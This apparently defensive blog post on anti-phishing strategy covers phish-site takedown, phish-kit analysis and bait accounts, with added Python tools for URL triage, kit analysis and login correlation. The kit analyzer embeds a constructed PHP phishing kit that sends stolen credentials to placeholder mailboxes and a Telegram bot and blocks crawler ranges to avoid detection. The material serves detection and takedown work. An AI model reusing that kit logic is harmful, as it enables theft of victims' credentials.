Anti-Phishing strategy

Sanju Mathew
3 min read · May 18, 2021


Phishing Attack sequence and common defense approach

To stop modern phishing attacks, they must be made unprofitable. That requires a more comprehensive and aggressive strategy: one that fully mitigates active phishing attacks, minimizes cybercrime gains, and disrupts phishing operations.

Mitigate active phishing attacks — When an attack is launched, it is critical to respond quickly to minimize the immediate impact: the longer the phishing site stays up, the more credentials are stolen. Detecting and shutting down phish sites entails collecting and processing email and web data from a broad range of relevant sources, so that there is enough visibility to detect an attack quickly and initiate the shutdown. It is possible to shut down a phish site within hours of the attack being launched. There is, however, always a window between the moment a phishing site is detected and the moment it can be taken down, and during that window targeted customers are at risk of visiting the site and submitting their credentials.

To minimize this risk, confirmed phish sites should be reported (broadcast) to the major internet browsers and to security products such as anti-virus and web-filtering products, where they are added to malicious-site block lists that stop users from reaching the site even while it is still live.
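The detection side of this step, processing collected email data for links that impersonate a protected brand, is easy to show concretely. The following is an added example written for this page, not code from the original post or from any product it describes. It assumes a single defended domain (`examplebank.com`) and a constructed sample message; the homoglyph table, the two-label "registrable domain" shortcut and the edit-distance threshold are simplifications a real pipeline would replace with the Public Suffix List and tuned thresholds.

```python
import re
from urllib.parse import urlparse

# Assumption: the brand domain being defended (not from the original post).
PROTECTED = ["examplebank.com"]

# Character substitutions commonly used to fake a brand name, mapped back to
# what the victim's eye reads.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed sample message, standing in for mail collected from an abuse
# mailbox or a user report.
SAMPLE_EMAIL = """From: "ExampleBank Security" <alerts@examp1ebank.com>
Subject: Urgent: verify your account

Dear customer, unusual activity was detected. Confirm your identity at
https://examp1ebank.com/verify or https://examplebank.com.secure-login.net/
within 24 hours. Need help? Visit https://www.examplebank.com/help
"""


def extract_urls(text):
    """Pull every http(s) URL out of a message, dropping trailing punctuation."""
    return [u.rstrip(".,;:)") for u in URL_RE.findall(text)]


def registrable(host):
    # Simplification: treat the last two labels as the registrable domain.
    # Production code should consult the Public Suffix List (co.uk, com.au, ...).
    return ".".join(host.split(".")[-2:])


def normalize(label):
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url):
    """Return one of: legitimate, homoglyph, brand-abuse, typosquat, unknown."""
    host = (urlparse(url).hostname or "").lower()
    reg = registrable(host)
    for brand in PROTECTED:
        if host == brand or host.endswith("." + brand):
            return "legitimate"
    for brand in PROTECTED:
        brand_name = brand.split(".")[0]
        if normalize(reg) == brand:
            return "homoglyph"      # e.g. examp1ebank.com
        if brand_name in host:
            return "brand-abuse"    # e.g. examplebank.com.secure-login.net
        if levenshtein(reg.split(".")[0], brand_name) <= 2:
            return "typosquat"      # e.g. exanplebank.com
    return "unknown"


def triage(email_text):
    """URLs in a message that need analyst review, paired with their verdict."""
    return [(u, classify(u)) for u in extract_urls(email_text) if classify(u) != "legitimate"]


if __name__ == "__main__":
    for url, verdict in triage(SAMPLE_EMAIL):
        print(f"{verdict:12s} {url}")
```

Anything that comes back as `homoglyph`, `brand-abuse` or `typosquat` is a candidate for the takedown and block-list reporting described above; `unknown` hosts still need a look (the kit may sit on a compromised, unrelated domain), but they cannot be flagged by name matching alone.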

Minimize cybercrime gains — Launching an attack does not guarantee a profit for the cybercriminal. Finding and analyzing the phish kit used in an attack can reveal a great deal of intelligence that can be used to disrupt cybercrime operations and prevent fraud. Phishers often leave the kit on the web server used in the attack, and many of those servers are configured with directory indexing enabled, which makes it easy to browse the directory and retrieve the kit. Analysis of the kit reveals where the data stolen by the scam is sent, such as drop sites or email accounts. Even with rapid takedown of a phish site, some credentials will already have been stolen.

However, recovering those credentials neutralizes the risk of their being used for fraud. Once the drop sites or email accounts used in an attack are found, they can be shut down, which cuts off the collection of stolen credentials that the phisher needs in order to profit. Money mule operations are the last mile of the fraud process. By investigating aspects of the phishing attack, such as the flow of credentials and where fraudulent transactions are being sent, it is possible to trace the money mule operations that monetize the attack. Action can then be taken to disrupt those operations and the recruitment scams they rely on to find mules.
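The kit analysis the two paragraphs above describe, finding where stolen credentials are sent so the drop points can be shut down, is mostly a matter of reading the kit's collection script. Below is an added example written for this page (not code from the original post or from any real kit): it builds a constructed, harmless stand-in for a kit archive in memory, then extracts the mail recipients, exfiltration URLs, local result files, victim redirect and crawler block-list from it. The file names, addresses and the Telegram bot token are placeholders invented for the example; the regular expressions target the PHP idioms most kits use, and a real triage tool would need more patterns (obfuscated strings, base64-encoded addresses, includes).

```python
import io
import re
import zipfile

# Constructed stand-in for a phish kit recovered from an open directory.
# Not a real kit; addresses, domains and the bot token are placeholders.
SAMPLE_KIT_FILES = {
    "examplebank/index.php": "<form method='post' action='post.php'>"
                             "<input name='user'><input name='pass'></form>",
    "examplebank/post.php": """<?php
$ip = $_SERVER['REMOTE_ADDR'];
$message = "User: " . $_POST['user'] . " Pass: " . $_POST['pass'] . " IP: " . $ip;
$to = "dropbox.operator@example.net";
$subject = "Rezult | " . $ip;
mail($to, $subject, $message);
mail("second.collector@example.org", $subject, $message);
file_put_contents("rezults.txt", $message . PHP_EOL, FILE_APPEND);
$ch = curl_init("https://api.telegram.org/bot123456:ABCDEF/sendMessage?chat_id=42&text=" . urlencode($message));
curl_exec($ch);
header("Location: https://www.examplebank.com/");
?>""",
    "examplebank/.htaccess": "deny from 66.249.\ndeny from 64.233.\n",
}

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[\"']([^\"']*)[\"']")
MAIL_RE = re.compile(r"\bmail\s*\(\s*(\$\w+|[\"'][^\"']+[\"'])")
CURL_RE = re.compile(r"(?:curl_init\s*\(|CURLOPT_URL\s*,)\s*[\"']([^\"']+)")
WRITE_RE = re.compile(r"(?:file_put_contents|fopen)\s*\(\s*[\"']([^\"']+)")
REDIRECT_RE = re.compile(r"header\s*\(\s*[\"']Location:\s*([^\"']+)")
DENY_RE = re.compile(r"^\s*deny from\s+(\S+)", re.I | re.M)


def build_sample_kit():
    """Zip the constructed files the way a kit is usually found on the server."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in SAMPLE_KIT_FILES.items():
            zf.writestr(name, body)
    return buf.getvalue()


def analyze_kit(zip_bytes):
    """Extract exfiltration and evasion indicators from a kit archive."""
    report = {"mail_recipients": set(), "exfil_urls": set(), "local_logs": set(),
              "redirects": set(), "blocked_ranges": set()}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info.filename).decode("utf-8", "replace")
            assigns = dict(ASSIGN_RE.findall(text))   # $to = "..." style literals
            for arg in MAIL_RE.findall(text):
                # A variable recipient is resolved through the assignment table;
                # otherwise the quoted literal is the address itself.
                addr = assigns.get(arg[1:]) if arg.startswith("$") else arg.strip("\"'")
                if addr:
                    report["mail_recipients"].add(addr)
            report["exfil_urls"].update(CURL_RE.findall(text))        # drop sites / bots
            report["local_logs"].update(WRITE_RE.findall(text))       # results left on the server
            report["redirects"].update(u.strip() for u in REDIRECT_RE.findall(text))
            if info.filename.endswith(".htaccess"):
                # Kits often block security-vendor and search-engine ranges to
                # stay out of block lists; the list itself is an indicator.
                report["blocked_ranges"].update(DENY_RE.findall(text))
    return {key: sorted(values) for key, values in report.items()}


if __name__ == "__main__":
    for key, values in analyze_kit(build_sample_kit()).items():
        print(f"{key}: {values}")
```

Each mail recipient and exfiltration URL in the report is a takedown target in its own right (the mailbox provider or bot platform, not just the hosting provider), and a local results file such as `rezults.txt` is worth fetching before the site goes down, since it may contain the credentials that need to be reset.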

Disrupt phishing operations — Investigating phishing attacks can also identify the mailer tool used to send the phish emails. Mailer programs are rarely custom-built for an individual campaign, so once one has been identified, steps can be taken to disrupt its distribution and make it harder to find online. Baiting is a method of tracing the operational flow of a phishing attack to gather intelligence that can be used to stop attacks and prevent fraud. It involves creating a set of fake accounts (the bait), submitting their credentials to the phishing site, and then monitoring the legitimate site for any activity involving those accounts.

Any login to a bait account reveals the attacker's IP address, user agent, device fingerprint and other details, which can then be used to detect other fraudulent activity linked to the same actor. Analysis of this sort builds a clearer picture of the cybercriminal operation and enables more aggressive steps to prevent attacks. It also shows how and where the kit is being distributed; shutting down the site hosting the kit is the ideal outcome. The best way to stop phishing attacks is to arrest and prosecute the criminals. Phishing attacks happen so frequently, however, that simply reporting them to the authorities rarely leads to law enforcement action. If actionable intelligence from investigating the attack and its underlying ecosystem is provided, law enforcement action becomes far more likely.
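The monitoring half of baiting, watching the legitimate site for the canary accounts and pivoting from them to other victims, is a small correlation job over the authentication log. The following is an added example written for this page, not code from the original post; the log format, the bait account names and every record in it are constructed for the illustration, and the field names (`ip`, `ua`, `fp`) stand in for whatever the real login service records. It also carries the caveat a practitioner would want: a user agent is shared by too many clients to pivot on by itself, so it is collected as an indicator but never used alone to link accounts.

```python
import re

# Assumption: canary accounts whose credentials were submitted to the phish site.
BAIT_ACCOUNTS = {"bait.user01", "bait.user02"}

# Constructed login records from the legitimate site, standing in for an
# authentication log export. Format, names and addresses are invented.
SAMPLE_LOG = """\
2021-05-18T09:00:01Z login ok user=alice ip=198.51.100.7 ua="Mozilla/5.0 (iPhone)" fp=f1a1
2021-05-18T10:02:11Z login ok user=bait.user01 ip=203.0.113.5 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=c0de
2021-05-18T10:03:40Z login ok user=bob ip=203.0.113.5 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=c0de
2021-05-18T10:05:02Z login fail user=bait.user02 ip=203.0.113.9 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=c0de
2021-05-18T10:07:55Z login ok user=carol ip=203.0.113.9 ua="Mozilla/5.0 (Windows NT 10.0)" fp=9f9f
2021-05-18T11:00:00Z login ok user=dave ip=192.0.2.44 ua="Mozilla/5.0 (X11; Linux x86_64)" fp=77aa
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) login (?P<result>\w+) user=(?P<user>\S+) ip=(?P<ip>\S+) '
    r'ua="(?P<ua>[^"]*)" fp=(?P<fp>\S+)$'
)


def parse_log(text):
    """Parse the constructed log format into one dict per login event."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def correlate(events, bait_accounts):
    """Turn bait-account activity into indicators, then find other accounts
    touched from the same infrastructure."""
    # A failed attempt against a bait account still reveals the attacker's
    # origin, so both successful and failed events are kept here.
    bait_hits = [e for e in events if e["user"] in bait_accounts]
    indicators = {
        "ip": sorted({e["ip"] for e in bait_hits}),
        "fingerprint": sorted({e["fp"] for e in bait_hits}),
        "user_agent": sorted({e["ua"] for e in bait_hits}),
    }
    linked = {}
    for e in events:
        if e["user"] in bait_accounts:
            continue
        # IP and device fingerprint are specific enough to pivot on; a user
        # agent is shared by far too many clients and is never used alone.
        matched = []
        if e["ip"] in indicators["ip"]:
            matched.append("ip")
        if e["fp"] in indicators["fingerprint"]:
            matched.append("fingerprint")
        if matched:
            linked.setdefault(e["user"], set()).update(matched)
    return {
        "first_bait_login": min(e["ts"] for e in bait_hits) if bait_hits else None,
        "indicators": indicators,
        "linked_accounts": {u: sorted(m) for u, m in sorted(linked.items())},
    }


if __name__ == "__main__":
    result = correlate(parse_log(SAMPLE_LOG), BAIT_ACCOUNTS)
    print("attacker first used bait at", result["first_bait_login"])
    print("indicators:", result["indicators"])
    print("other accounts touched from the same infrastructure:", result["linked_accounts"])
```

On the constructed records, `bob` is linked by both IP and device fingerprint and `carol` by IP only, so both are candidates for credential reset and fraud review; `dave` shares only the user agent with the attacker and is correctly left alone. The `first_bait_login` timestamp also tells you how long after the credentials were planted the phisher (or the buyer of the credentials) first tried them, which is useful for judging how fast takedown has to be.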
